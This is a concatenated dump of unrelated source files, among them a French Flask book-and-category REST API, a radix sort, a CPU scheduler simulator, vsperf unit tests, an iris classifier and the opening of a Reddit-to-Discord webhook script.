def search_one_categories(id):
try:
categorie=Categorie.query.get(id)
if categorie is None:
resultat=jsonify({
'Success':False,
'Resultat':'categorie inexistante!!'
})
else:
resultat= jsonify({
'Success':"True la catégorie existe",
'Categorie':categorie.categorie_format,
})
return resultat
except:
abort(400)
"""
#Lister toutes les catégories
@app.route('/categories',methods=['GET'])
def get_all_categories():
categories=Categorie.query.all()
if categories is None:
abort(404)
else:
categories_format=[c.categorie_format() for c in categories]
return jsonify({
'Success':True,
'Categories':categories_format,
'Total':Categorie.query.count()
})
##Supprimer un livre
@app.route('/livres/<int:id>',methods=['DELETE'])
def delete_one_book(id):
try:
livre_a_supprimer=Livre.query.get(id)
if livre_a_supprimer is None:
abort(404)
else:
livre_a_supprimer.supprimer_livre()
return jsonify({'Success':True,
'Livre supprimé': livre_a_supprimer.livre_format(),
'Total livres':Livre.query.count()
})
except :
abort(422)
#Supprimer une categorie
@app.route('/categories/<int:id>',methods=['DELETE'])
def delete_one_categories(id):
try:
categorie=Categorie.query.get(id)
if categorie is None:
abort(404)
else:
categorie.supprimer_categorie()
return jsonify({
'Success':True,
'Categorie supprimé':categorie.categorie_format(),
'Total':Categorie.query.count()
})
except :
abort(400)
#Modifier les informations d'un livre
@app.route('/livres/<int:id>',methods=['PATCH'])
def update_one_book(id):
donnee=request.get_json()
livre=Livre.query.get(id)
livre.isbn=donnee.get("isbn",None)
livre.titre=donnee.get("titre",None)
livre.auteur=donnee.get("auteur",None)
livre.editeur=donnee.get("editeur",None)
livre.date_publication=donnee.get("date",None)
livre.categorie_id=donnee.get("categorie",None)
if livre.isbn is None or livre.titre is None or livre.auteur is None or livre.editeur is None or livre.date_publication is None or livre.categorie_id is None :
abort(400)
else:
livre.modifier_livre()
return jsonify({
"success":True,
"Livre modifie":livre.livre_format()
})
@app.route('/categories/<int:id>',methods=['PATCH'])
def update_one_category(id):
donnee=request.get_json()
categorie=Categorie.query.get(id)
categorie.libelle_categorie=donnee.get("categorie",None)
if categorie.libelle_categorie is None:
abort(400)
else:
categorie.modifier_categorie()
return jsonify({"success":True,
"Categorie modifie":categorie.categorie_format()
})
@app.route('/livres',methods=['POST'])
def create_book():
donnees=request.get_json()
isbn=donnees.get("isbn",None)
titre=donnees.get("titre",None)
date=donnees.get("date",None)
auteur=donnees.get('auteur',None)
editeur=donnees.get("editeur",None)
cat=donnees.get("categorie",None)
livre=Livre(isbn=isbn,titre=titre,date_publication=date,auteur=auteur,editeur=editeur,categorie_id=cat)
livre.inserer_livre()
return jsonify({
"success": True,
"Nouveau livre " :livre.livre_format(),
"Total":Livre.query.count()
})
@app.route('/categories',methods=['POST'])
def add_categories():
donnees=request.get_json()
lib=donnees.get("libelle_categorie",None)
if lib is None:
abort(404)
else:
cat=Categorie(libelle_categorie=lib)
cat.inserer_categorie()
return jsonify({
"success": True,
"Categorie cree": cat.categorie_format()
})
@app.errorhandler(404)
def not_found(error):
return jsonify({'success':False,'error': 404,'message': 'not found'}),404
@app.errorhandler(400)
def server_error(error):
return jsonify({'success':False,'error': 400,'message': 'bad request'}),400
if __name__=='__main__':
app.run(debug=True)
| 2.5 | 2 |
code/radix_sort.py | mrtryhard/SortingsBenchmarkPython | 0 | 12770770 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import math
# Tri par base (RadixSort)
# lst : liste à trier
# max_len : longueur max d'un nombre (int: 10)
def tri_par_base(lst, max_len = 10):
# un nombre n'aura pas plus que 10 digit.
NB_BUCKETS = 10
for x in range(max_len):
# Initialise les buckets
buckets = [[] for i in range(NB_BUCKETS)]
# Pour chaque élément dans la liste on l'affecte à son bucket.
for y in lst:
buckets[math.floor( (y / 10 ** x) % NB_BUCKETS)].append(y)
# Applati le bucket.
lst = []
for section in buckets:
lst.extend(section)
return lst
if __name__ == '__main__':
if len(sys.argv) == 1:
print("Requires list.")
else:
list_of_integers = [int(i) for i in sys.argv[1:]]
lst = tri_par_base(list_of_integers)
print("Sorted List: ")
print(lst)
print("Radix sort end.") | 3.828125 | 4 |
structural/facade.py | zhengxiaowai/python-javascript-design-patterns | 6 | 12770771 | <reponame>zhengxiaowai/python-javascript-design-patterns
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class HardWare(object):
def power_on(self):
print('上电')
def bootloader(self):
print('bootloader 启动')
def power_off(self):
print('断电')
class OperatingSystem(object):
def load_kernel(self):
print('加载内核')
def load_image(self):
print('加载镜像')
def exit_os(self):
print('退出操作系统')
class SoftWare(object):
def load_app(self):
print('加载应用程序')
def exit_app(self):
print('退出应用程序')
class Computer(object):
def __init__(self):
self.hw = HardWare()
self.os = OperatingSystem()
self.sw = SoftWare()
def boot(self):
self.hw.power_on()
self.hw.bootloader()
self.os.load_kernel()
self.os.load_image()
self.sw.load_app()
def shut_down(self):
self.sw.exit_app()
self.os.exit_os()
self.hw.power_off()
if __name__ == '__main__':
computer = Computer()
print('开机')
computer.boot()
print('\n关机')
computer.shut_down()
| 3.171875 | 3 |
bin/get_tractor_images.py | UnofficialJuliaMirrorSnapshots/SloanDigitalSkySurvey.jl-d2185075-3040-5c42-a634-a12f38dbd79b | 0 | 12770772 | #!/usr/bin/python
#
# Load a processed image from the tractor. Note that as of writing,
# the masking was incorrect.
# https://github.com/dstndstn/tractor
from tractor.sdss import *
import argparse
import numpy
import copy
parser = argparse.ArgumentParser()
parser.add_argument('--run', type=int, help='The run number.', default=3900)
parser.add_argument('--camcol', type=int, help='The camcol number.', default=6)
parser.add_argument('--field', type=int, help='The field number.', default=269)
parser.add_argument('--band', type=int, help='The band (a number from 0 to 4).', default=3)
parser.add_argument('--destination_base', type=str,
help=('Output will be written to files like '
'<destination_base>_<run>_<camcol>_<field>_<description>.csv'),
default="/tmp/test")
args = parser.parse_args()
bands = ['u', 'g', 'r', 'i', 'z']
bandname = bands[args.band]
# Note that get_tractor_image_dr9 just calls get_tractor_image_dr8
img = get_tractor_image_dr8(args.run, args.camcol, args.field, bandname, nanomaggies=True)
sources = get_tractor_sources_dr9(args.run, args.camcol, args.field,
nanomaggies=True, fixedComposites=True, useObjcType=True)
file_base = args.destination_base + ('_%d_%d_%d_' % (args.run, args.camcol, args.field))
band_str = '%d_' % (args.band + 1) # Python uses 0 indexing
numpy.savetxt(file_base + band_str + "img.csv", img[0].data, delimiter=",")
numpy.savetxt(file_base + band_str + "psf.csv", img[0].psf, delimiter=",")
sdss = DR8()
# Mask the image. Note that as of now, the
masked_img_data = copy.deepcopy(img[0].data)
fpM = sdss.readFpM(args.run, args.camcol, args.field, bandname)
for plane in [ 'INTERP', 'SATUR', 'CR', 'GHOST' ]:
fpM.setMaskedPixels(plane, masked_img_data, NaN)
print sum(numpy.isnan(masked_img_data))
numpy.savetxt(file_base + band_str + "masked_img.csv", masked_img_data, delimiter=",")
# Debugging the mask:
if False:
size(fpM.getMaskPlane('INTERP').rmin) # INTERP is element 1 in the 0-indexed python.
name = 'INTERP'
masked_img_data = copy.deepcopy(img[0].data)
val = NaN
M = fpM.getMaskPlane(name)
nan_pixels = 0
for (c0,c1,r0,r1,coff,roff) in zip(M.cmin,M.cmax,M.rmin,M.rmax,
M.col0, M.row0):
assert(coff == 0)
assert(roff == 0)
nan_pixels = nan_pixels + (r1 - r0 + 1) * (c1 - c0 + 1)
masked_img_data[r0:r1, c0:c1] = val
print nan_pixels
print sum(numpy.isnan(masked_img_data))
| 2.484375 | 2 |
simulation.py | thiagogvasc/CPU_Scheduler_Simulator | 1 | 12770773 | from process import Process
from process import State
class Simulation:
def __init__(self, data, cpu, scheduling):
self.data = data
self.cpu = cpu
self.scheduling = scheduling
self.processes = []
### Initiate all processes at the same time since they all arrive at t = 0
for i, processSimulationData in enumerate(data):
process = Process(i + 1, processSimulationData)
self.scheduling.addProcess(process)
self.processes.append(process)
self.time = 0
self.totalRunningTime = 0
# Check if all processes terminated
def terminated(self):
for process in self.processes:
if process.state != State.TERMINATED:
return False
return True
### Simulation Loop
def run(self):
# Stop only if all processes terminated
while not self.terminated():
# Update process state
for process in self.processes:
process.update()
# Update scheduling state
self.scheduling.update()
### Print formatted data
if (self.cpu.contextSwitch or self.terminated()):
print('Time: ' + str(self.time))
print('{:20}'.format('Process ID'), end='')
print('{:20}'.format('Burst Type'), end='')
print('{:20}'.format('Burst TIme'), end='')
print('{:20}'.format('Remaining Time'), end='')
print('{:20}'.format('State'), end='')
print()
for process in self.processes:
process.print()
self.cpu.contextSwitch = False
self.scheduling.printQueues()
print('----------------------------------------------------------------------------------------------')
# Track simulation result
for process in self.processes:
### Track waiting time
if process.state == State.READY:
process.totalWaitingTime += 1
### Track turnaround time
if process.state != State.TERMINATED:
process.turnaroundTime += 1
### Track response time
if process.previousState == State.NEW and process.state == State.READY:
process.responseTime += 1
# print('-----------------------------------------')
### Track total running time
if self.cpu.currentProcess:
if self.cpu.currentProcess.state == State.RUNNING:
self.totalRunningTime += 1
self.time += 1
### Compute results after simulation is finished
print('Results:')
waitingTimeSum = 0
turnaroundTimeSum = 0
responseTimeSum = 0
### Print formatted data
print('{:20}'.format('Process ID'), end='')
print('{:20}'.format('Tw (Waiting)'), end='')
print('{:20}'.format('Ttr (Turnaround)'), end='')
print('{:20}'.format('Tr (Response)'), end='')
print()
for process in self.processes:
print('{:20}'.format('P' + str(process.pid)), end='')
print('{:20}'.format(str(process.totalWaitingTime)), end='')
print('{:20}'.format(str(process.turnaroundTime)), end='')
print('{:20}'.format(str(process.responseTime)), end='')
print()
waitingTimeSum += process.totalWaitingTime
turnaroundTimeSum += process.turnaroundTime
responseTimeSum += process.responseTime
print('{:20}'.format('Average'), end='')
print('{:20}'.format(str(waitingTimeSum / 8)), end='')
print('{:20}'.format(str(turnaroundTimeSum / 8)), end='')
print('{:20}'.format(str(responseTimeSum / 8)), end='')
print()
print()
print('CPU Utilization: ', end='')
print(self.totalRunningTime/(self.time - 1) * 100)
print('Total time to finish all processes: ', end='')
print(self.time - 1 ) | 3.3125 | 3 |
lungs_ml/lungs_ml/visualization_service/__init__.py | dumaevrinat/lung_diseases | 3 | 12770774 | <reponame>dumaevrinat/lung_diseases<gh_stars>1-10
from .visualization_service import VisualizationService
| 1.03125 | 1 |
concat/tests/level1/test_execute.py | jmanuel1/concat | 5 | 12770775 | import concat.level1.execute
import unittest
import ast
from typing import Dict
class TestExecute(unittest.TestCase):
names = ['to_int', 'to_bool', 'to_complex', 'len', 'getitem', 'to_float',
'decode_bytes', 'to_tuple', 'to_bytes', 'to_list', 'to_bytearray',
'to_set', 'add_to_set', 'to_frozenset', 'to_dict',
'user_defined_function', 'method', 'with_async', 'for_async',
'coroutine', 'math', 'import_module', 'import_advanced',
'custom_class', 'instance', 'open', 'popen', 'fdopen', 'curry',
'call', 'drop', 'drop_2', 'drop_3', 'nip', 'nip_2', 'dup',
'dup_2', 'swap', 'dup_3', 'over', 'over_2', 'pick', 'to_slice',
'choose', 'if_then', 'if_not', 'case', 'loop']
def setUp(self) -> None:
pass
def test_execute_function(self) -> None:
module = ast.Module(body=[])
concat.level1.execute.execute('<test>', module, {})
# we passed if we get here
def test_preamble(self) -> None:
"""Test that the preamble adds correct names to the globals dict."""
module = ast.Module(body=[])
globals: Dict[str, object] = {}
concat.level1.execute.execute('<test>', module, globals)
for name in self.names:
with self.subTest(msg='presence of "{}"'.format(name), name=name):
message = 'preamble did not add "{}"'.format(name)
self.assertIn(name, globals, msg=message)
| 2.53125 | 3 |
src/bo4e/com/tarifpreispositionproort.py | bo4e/BO4E-python | 1 | 12770776 | """
Contains TarifpreispositionProOrt class
and corresponding marshmallow schema for de-/serialization
"""
from typing import List
import attr
from marshmallow import fields
from bo4e.com.com import COM, COMSchema
from bo4e.com.tarifpreisstaffelproort import TarifpreisstaffelProOrt, TarifpreisstaffelProOrtSchema
from bo4e.validators import check_list_length_at_least_one
# pylint: disable=too-few-public-methods
@attr.s(auto_attribs=True, kw_only=True)
class TarifpreispositionProOrt(COM):
"""
Mit dieser Komponente können Tarifpreise verschiedener Typen abgebildet werden
.. HINT::
`TarifpreispositionProOrt JSON Schema <https://json-schema.app/view/%23?url=https://raw.githubusercontent.com/Hochfrequenz/BO4E-python/main/json_schemas/com/TarifpreispositionProOrtSchema.json>`_
"""
# required attributes
#: Postleitzahl des Ortes für den der Preis gilt
postleitzahl: str = attr.ib(validator=attr.validators.matches_re(r"^\d{5}$"))
#: Ort für den der Preis gilt
ort: str = attr.ib(validator=attr.validators.instance_of(str))
#: ene't-Netznummer des Netzes in dem der Preis gilt
netznr: str = attr.ib(validator=attr.validators.instance_of(str))
# Hier sind die Staffeln mit ihren Preisenangaben definiert
preisstaffeln: List[TarifpreisstaffelProOrt] = attr.ib(
validator=[
attr.validators.deep_iterable(
member_validator=attr.validators.instance_of(TarifpreisstaffelProOrt),
iterable_validator=check_list_length_at_least_one,
),
]
)
# there are no optional attributes
class TarifpreispositionProOrtSchema(COMSchema):
"""
Schema for de-/serialization of TarifpreispositionProOrt.
"""
class_name = TarifpreispositionProOrt
# required attributes
postleitzahl = fields.Str()
ort = fields.Str()
netznr = fields.Str()
preisstaffeln = fields.List(fields.Nested(TarifpreisstaffelProOrtSchema))
| 1.929688 | 2 |
src/python/src/grpc/framework/foundation/later.py | iMilind/grpc | 2 | 12770777 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Enables scheduling execution at a later time."""
import time
from grpc.framework.foundation import _timer_future
def later(delay, computation):
"""Schedules later execution of a callable.
Args:
delay: Any numeric value. Represents the minimum length of time in seconds
to allow to pass before beginning the computation. No guarantees are made
about the maximum length of time that will pass.
computation: A callable that accepts no arguments.
Returns:
A Future representing the scheduled computation.
"""
timer_future = _timer_future.TimerFuture(time.time() + delay, computation)
timer_future.start()
return timer_future
| 1.375 | 1 |
pycrunch_trace/client/networking/client_trace_introspection.py | yswtrue/pycrunch-trace | 90 | 12770778 | import collections
from collections import defaultdict
from typing import List, Dict
from pycrunch_trace.tracing.file_map import FileMap
class ClientTraceIntrospection:
total_events: int
def __init__(self):
self.total_events = 0
self.stats = defaultdict(int)
# file id -> hit count
self.top_files = defaultdict(int)
def save_events(self, events: List):
self.total_events += len(events)
for e in events:
self.stats[e.event_name] += 1
self.top_files[e.cursor.file] += 1
def print_to_console(self, files: Dict[str, int]):
print('TraceIntrospection:')
print(' stats:')
for (each, hit_count) in self.stats.items():
print(f' - {each}:{hit_count}')
print(' files:')
filemap = FileMap.from_reverse(files)
sorted_x = sorted(self.top_files.items(), reverse=True, key=lambda kv: kv[1])
sortir = collections.OrderedDict(sorted_x)
for (each, hit_count) in sortir.items():
print(f' - {hit_count} hits in {filemap.filename_by_id(each)}')
client_introspection = ClientTraceIntrospection()
| 2.765625 | 3 |
week4_ml/aiDB.py | ohmink/relay_02 | 1 | 12770779 | import sqlite3
class AI_DB(object):
def __init__(self, db_file_name):
self.conn = sqlite3.connect(db_file_name)
self.cur = self.conn.cursor()
def read_1_data(self, user_id):
query = "SELECT * FROM user WHERE user_id="+str(user_id)
self.cur.execute(query)
row = self.cur.fetchall()
return row
def read_all_data(self):
query = "SELECT * FROM user"
self.cur.execute(query)
rows = self.cur.fetchall()
return rows
def updatePersonType(self, user_id, person_type):
query = "UPDATE user SET person_type = \""+str(person_type)+"\" WHERE user_id = "+str(user_id)
self.cur.execute(query)
def __del__(self):
print("DB class deleted.")
self.conn.commit()
self.conn.close()
'''
db = AI_DB("./chat2.db")
print(db.read_all_data())
print(db.read_1_data(1))
#db.updatePersonType(3, "G")
#print(db.read_all_data())
del db
#cur.execute("SELECT * FROM user")
#cur.execute("CREATE TABLE IF NOT EXISTS user(user_id integer primary key autoincrement, gender varchar(20), nickname varchar(20), type varchar(1))")
''' | 3.28125 | 3 |
FormManagement/migrations/0001_initial.py | SajedeNick1999/Payslip-Management- | 1 | 12770780 | # Generated by Django 3.0.8 on 2020-08-05 20:30
import django.contrib.postgres.fields
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('CompanyManagement', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Form',
fields=[
('ID', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, unique=True)),
('Field', django.contrib.postgres.fields.ArrayField(base_field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=100), size=None), size=None)),
('CompanyID', models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='CompanyManagement.Company')),
],
),
]
| 1.828125 | 2 |
a10/build/lib/a10/asvr/db/__init__.py | THS-on/AttestationEngine | 7 | 12770781 | <reponame>THS-on/AttestationEngine<gh_stars>1-10
# Copyright 2021 Nokia
# Licensed under the BSD 3-Clause Clear License.
# SPDX-License-Identifier: BSD-3-Clear
| 0.949219 | 1 |
yardstick/tests/unit/benchmark/scenarios/networking/test_vsperf_dpdk.py | mythwm/yardstick | 0 | 12770782 | <reponame>mythwm/yardstick
# Copyright 2017 Nokia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import time
import mock
import unittest
from yardstick.benchmark.scenarios.networking import vsperf_dpdk
class VsperfDPDKTestCase(unittest.TestCase):
def setUp(self):
self.ctx = {
"host": {
"ip": "10.229.47.137",
"user": "ubuntu",
"password": "<PASSWORD>",
},
}
self.args = {
'task_id': "1234-5678",
'options': {
'testname': 'pvp_tput',
'traffic_type': 'rfc2544_throughput',
'frame_size': '64',
'test_params': 'TRAFFICGEN_DURATION=30;',
'trafficgen_port1': 'ens4',
'trafficgen_port2': 'ens5',
'conf_file': 'vsperf-yardstick.conf',
'setup_script': 'setup_yardstick.sh',
'moongen_helper_file': '~/moongen.py',
'moongen_host_ip': '10.5.201.151',
'moongen_port1_mac': '8c:dc:d4:ae:7c:5c',
'moongen_port2_mac': '8c:dc:d4:ae:7c:5d',
'trafficgen_port1_nw': 'test2',
'trafficgen_port2_nw': 'test3',
},
'sla': {
'metrics': 'throughput_rx_fps',
'throughput_rx_fps': 500000,
'action': 'monitor',
}
}
self.scenario = vsperf_dpdk.VsperfDPDK(self.args, self.ctx)
self._mock_ssh = mock.patch(
'yardstick.benchmark.scenarios.networking.vsperf_dpdk.ssh')
self.mock_ssh = self._mock_ssh.start()
self._mock_subprocess_call = mock.patch.object(subprocess, 'call')
self.mock_subprocess_call = self._mock_subprocess_call.start()
self.addCleanup(self._cleanup)
def _cleanup(self):
self._mock_ssh.stop()
self._mock_subprocess_call.stop()
def test_setup(self):
# setup() specific mocks
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
def test_teardown(self):
# setup() specific mocks
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
self.scenario.teardown()
self.assertFalse(self.scenario.setup_done)
def test_is_dpdk_setup_no(self):
# setup() specific mocks
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
# is_dpdk_setup() specific mocks
self.mock_ssh.SSH.from_node().execute.return_value = (0, 'dummy', '')
result = self.scenario._is_dpdk_setup()
self.assertFalse(result)
def test_is_dpdk_setup_yes(self):
# setup() specific mocks
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
# is_dpdk_setup() specific mocks
self.mock_ssh.SSH.from_node().execute.return_value = (0, '', '')
result = self.scenario._is_dpdk_setup()
self.assertTrue(result)
@mock.patch.object(time, 'sleep')
def test_dpdk_setup_first(self, *args):
# setup() specific mocks
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
# is_dpdk_setup() specific mocks
self.mock_ssh.SSH.from_node().execute.return_value = (0, 'dummy', '')
self.scenario.dpdk_setup()
self.assertFalse(self.scenario._is_dpdk_setup())
self.assertTrue(self.scenario.dpdk_setup_done)
@mock.patch.object(time, 'sleep')
def test_dpdk_setup_next(self, *args):
# setup() specific mocks
self.mock_ssh.SSH.from_node().execute.return_value = (0, '', '')
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
self.scenario.dpdk_setup()
self.assertTrue(self.scenario._is_dpdk_setup())
self.assertTrue(self.scenario.dpdk_setup_done)
@mock.patch.object(time, 'sleep')
def test_dpdk_setup_runtime_error(self, *args):
# setup specific mocks
self.mock_ssh.SSH.from_node().execute.return_value = (0, '', '')
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.mock_ssh.SSH.from_node().execute.return_value = (1, '', '')
self.assertTrue(self.scenario.setup_done)
self.assertRaises(RuntimeError, self.scenario.dpdk_setup)
@mock.patch.object(subprocess, 'check_output')
@mock.patch('time.sleep')
def test_run_ok(self, *args):
# setup() specific mocks
self.mock_ssh.SSH.from_node().execute.return_value = (0, '', '')
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
# run() specific mocks
self.mock_subprocess_call().execute.return_value = None
self.mock_ssh.SSH.from_node().execute.return_value = (
0, 'throughput_rx_fps\r\n14797660.000\r\n', '')
result = {}
self.scenario.run(result)
self.assertEqual(result['throughput_rx_fps'], '14797660.000')
def test_run_failed_vsperf_execution(self):
# setup() specific mocks
self.mock_ssh.SSH.from_node().execute.return_value = (0, '', '')
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
self.mock_ssh.SSH.from_node().execute.return_value = (1, '', '')
result = {}
self.assertRaises(RuntimeError, self.scenario.run, result)
def test_run_falied_csv_report(self):
# setup() specific mocks
self.mock_ssh.SSH.from_node().execute.return_value = (0, '', '')
self.mock_subprocess_call().execute.return_value = None
self.scenario.setup()
self.assertIsNotNone(self.scenario.client)
self.assertTrue(self.scenario.setup_done)
# run() specific mocks
self.mock_subprocess_call().execute.return_value = None
self.mock_ssh.SSH.from_node().execute.return_value = (1, '', '')
result = {}
self.assertRaises(RuntimeError, self.scenario.run, result)
| 1.78125 | 2 |
pro1/interviews/urls.py | BhanuPrakashNani/StudentPortal | 0 | 12770783 | <filename>pro1/interviews/urls.py<gh_stars>0
from django.urls import path,include
from . import views
urlpatterns = [
path('',views.home, name='interview-home'),
]
| 1.75 | 2 |
src/versions/Iter4/helpapp-seproject/api/update_user.py | chenbachar/MitzvahApp | 0 | 12770784 | import webapp2
import json
from models.user import User
class UpdateUserHandler(webapp2.RequestHandler):
def get(self):
user = User.checkUser()
if not user:
return
update_name = self.request.get('name')
update_car = self.request.get('car')
needCar = False
if update_car == 'true':
needCar = True
if update_name and update_car:
update = User.updateInfo(user.email,update_name,needCar)
self.response.write(json.dumps({'status':'ok'}))
else:
self.response.write(json.dumps({'status':'error'}))
app = webapp2.WSGIApplication([
('/update_user', UpdateUserHandler)
], debug=True) | 2.46875 | 2 |
next/boot/fe/parser.py | 27Saumya/next | 2 | 12770785 | <reponame>27Saumya/next
# Copyright 2022 VincentRPS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rply
from .ast import Print, Integer
from .lexer import listed
from ..be import Configurator
class Parser:
def __init__(self, ir: Configurator):
self._parser = rply.ParserGenerator(listed)
self.ir = ir
def start(self):
@self._parser.production('program : PRINT OPEN_PAREN expression CLOSE_PAREN')
def print_(p):
return Print(self.ir, p[2])
@self._parser.production('expression : INTEGER')
def integer(p):
return Integer(self.ir, p[0].value)
def build(self):
return self._parser.build()
| 2.34375 | 2 |
jobapplications/migrations/0005_auto_20200204_1927.py | MattYu/ConcordiaAce | 1 | 12770786 | <gh_stars>1-10
# Generated by Django 3.0 on 2020-02-05 00:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobapplications', '0004_auto_20200204_0004'),
]
operations = [
migrations.RemoveField(
model_name='ranking',
name='preferredName',
),
migrations.AddField(
model_name='ranking',
name='is_ranking_open',
field=models.BooleanField(default=True),
),
migrations.AlterField(
model_name='ranking',
name='status',
field=models.CharField(choices=[('Pending Review', 'Pending Coop Review'), ('Not Approved', 'Not Approved'), ('Submitted', 'Submitted to Employer'), ('Interviewing', 'Selected for Interview'), ('Not Selected', 'Not Selected'), ('Ranked', 'Ranked by Employer'), ('Matched', 'Matched'), ('Not Matched', 'Not Matched'), ('Closed', 'Closed')], default='Interviewing', max_length=20),
),
]
| 1.757813 | 2 |
irisProblem.py | wriggs12/Machine-Learning-Practice | 1 | 12770787 | <filename>irisProblem.py<gh_stars>1-10
import numpy as np
from scipy.spatial import distance
import matplotlib.pyplot as plt
def euc(a, b):
return distance.euclidean(a, b)
class personalKNN():
def fit(self, X_train, y_train):
self.X_train = X_train
self.y_train = y_train
def predict(self, X_test):
predictions = []
for row in X_test:
label = self.closest(row)
predictions.append(label)
return predictions
def closest(self, row):
smallestDist = euc(row, self.X_train[0])
index = 0
for i in range(1, len(self.X_train)):
dist = euc(row, self.X_train[i])
if dist < smallestDist:
smallestDist = dist
index = i
return self.y_train[index]
class personalKMean():
def __init__(self, k = 3, tol = 0.0001, maxIterations = 300):
self.k = k
self.tol = tol
self.maxIterations = maxIterations
def fit(self, data):
self.clusters = {}
for i in range(self.k):
self.clusters[i] = data[i]
for i in range(self.maxIterations):
self.classifications = {}
for i in range(self.k):
self.classifications[i] = []
for point in data:
distances = [np.linalg.norm(point - self.clusters[cluster]) for cluster in self.clusters]
classification = distances.index(min(distances))
self.classifications[classification].append(point)
prevClusters = dict(self.clusters)
for group in self.classifications:
self.clusters[group] = np.average(self.classifications[group], axis=0)
optimized = True
for cluster in self.clusters:
originalCluster = prevClusters[cluster]
curCluster = self.clusters[cluster]
if np.sum((curCluster - originalCluster) / originalCluster * 100.0) > self.tol:
optimized = False
if optimized:
break
def predict(self, data):
distances = [np.linalg.norm(data - self.clusters[cluster]) for cluster in self.clusters]
classification = distances.index(min(distances))
return classification
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn import tree
iris = load_iris()
X = iris.data
y = iris.target
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.5)
#1 Decision Tree Classifier
treeClassifier = tree.DecisionTreeClassifier()
treeClassifier.fit(X_train, y_train)
treePrediction = treeClassifier.predict(X_test)
print('Accuracy using a Decision Tree')
print(accuracy_score(y_test, treePrediction))
#2 K-Nearest Neighbors Classifier
personalClassifier = personalKNN()
personalClassifier.fit(X_train, y_train)
personalPrediction = personalClassifier.predict(X_test)
print('Accuracy using my own K Nearest Neighbor Model')
print(accuracy_score(y_test, personalPrediction))
#3 K-Means Classifier
personalMeanClassifier = personalKMean()
personalMeanClassifier.fit(X_train)
correct = 0
for i in range(len(X_test)):
dataPoint = X_test[i]
prediction = personalMeanClassifier.predict(dataPoint)
if prediction == y_test[i]:
correct += 1
accuracy = correct / len(X_test)
print('Accuracy using my own K Means Clustering Model')
print(accuracy) | 2.609375 | 3 |
script_remote.py | ArthurSStrong/actions-bot | 0 | 12770788 | <gh_stars>0
"""
Connects to the Reddit API to get rising submissions details and posts
them to a Discord webhook.
"""
import os
import requests
import random
WEBHOOK_URL = os.environ["WEBHOOK"]
def main():
"""Start the script."""
list_reddit = ['doodles','DigitalPainting','drawing','Illustration','conceptart','painting','Watercolor']
print("Connecting to Reddit...")
message, image_url = get_rising_submissions(random.choice(list_reddit))
print("Data received. Sending webhook...")
